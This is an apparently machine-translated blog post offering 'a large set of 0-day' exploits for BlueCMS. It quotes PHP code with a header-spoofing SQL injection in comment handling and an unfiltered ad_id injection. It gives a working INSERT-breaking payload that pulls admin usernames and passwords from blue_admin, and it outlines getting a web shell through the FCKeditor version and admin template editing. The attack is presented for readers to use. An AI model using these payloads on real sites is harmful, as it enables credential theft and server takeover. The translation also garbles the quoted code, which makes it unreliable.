Large set of 0-day Bluecms

 

 

Collect your MJJ

 

0x01. Injection

Client_ip counterfeit Injection

Check the code,

Here, the getip function obtains the Ip address, because both client_ip and x_forwarded_for can be forged.

In line 106 of include/common. fun. php

Function getip ()
{
If (getenv ('HTTP _ CLIENT_IP '))
{
$ Ip = getenv ('HTTP _ CLIENT_IP ');
}

Elseif (getenv ('HTTP _ X_FORWARDED_FOR '))
{// Obtain the real ip address used by the proxy server to access the client
$ Ip = getenv ('HTTP _ X_FORWARDED_FOR ');
}
Elseif (getenv ('HTTP _ x_forwarded '))
{
$ Ip = getenv ('HTTP _ x_forwarded ');
}
Elseif (getenv ('HTTP _ FORWARDED_FOR '))
{
$ Ip = getenv ('HTTP _ FORWARDED_FOR ');
}
Elseif (getenv ('HTTP _ forwarded '))
{
$ Ip = getenv ('HTTP _ forwarded ');
}
Else
{
$ Ip = $ _ SERVER ['remote _ ADDR '];
}
Return $ ip;
}

We will continue to track the application of the getip () function.

Row 113 in comment. php

$ SQL = "INSERT INTO". table ('comment'). "(com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check)
VALUES ('', '$ id',' $ user_id ',' $ type', '$ mood', '$ content',' $ timestamp ','". getip (). "',' $ is_check ')";

$ Db-> query ($ SQL );

 

Here we test the counterfeit ip address.

View results

 

 

 

 

 

Can you see it?

Already injected

The problem here is that the error is .. It has independently written an error statement, so that we cannot use the error statement to directly expose the user name and password. However, we can use blind injection to create user names and passwords. But this is too troublesome. I have been thinking, thinking, and using what method to note, note, note .......

After all, human thinking is too broad. Because this is an insert statement, We can insert the information we want and display it on the front-end page,

We can construct statements in this way.

A', 'xxx'), ('', '1', '1', '1', '1', '2', (select concat (admin_name, 0x3a, pwd) from blue_admin limit 1645457407), '123', 'ss', '1 ')#

The previous insert statement is closed. Because of the insert statement, We can insert into table (a, B, c) values ('fuck1', 'fuck2', 'fuck3 '), ('fuck4', 'fuck5', 'fuck6 ')...... in this way, you can insert a few more. In this way, we can bid ourselves,

Let's test

Have you seen it? We have obtained the user name and password.

This is one of them.

 

0x02 continue the previous Injection

19 rows in ad. js. php

$ Ad_id =! Empty ($ _ GET ['ad _ id'])? Trim ($ _ GET ['ad _ id']): '';
If (empty ($ ad_id ))
{
Echo 'error! ';
Exit ();
}

$ Ad = $ db-> getone ("SELECT * FROM". table ('ad'). "WHERE ad_id =". $ ad_id );

 

$ Ad_id here is passed without any filtering, and it is injected directly here.

 

So here is the naked injection.

 

So here you can select a site.

 

 

0x03 getshell

Let's talk about it again, directly getshell

Fck

Version, 2.6.3

Getshell

 

 

0x04 use shell in the background

Go to system settings, go to template management, and click Edit

The template www.2cto.com is edited here.

Click Edit

 

 

Go to the upper-level directory.

 

 

There may be many problems.

Regardless of the security issues with a set of programs, I still don't despise these programmers because the real cms requires me to develop, I can only say that I ......, in the past, I also looked at some programs with BS mentality that had a lot of security problems. Finally, when I went to development one day, I understood it. In fact, I used to look at the SB program I wrote today with the SB mentality. So the last sentence is to respect the fruits of others' work.
From: http://hi.baidu.com/sethc5/blog Xidu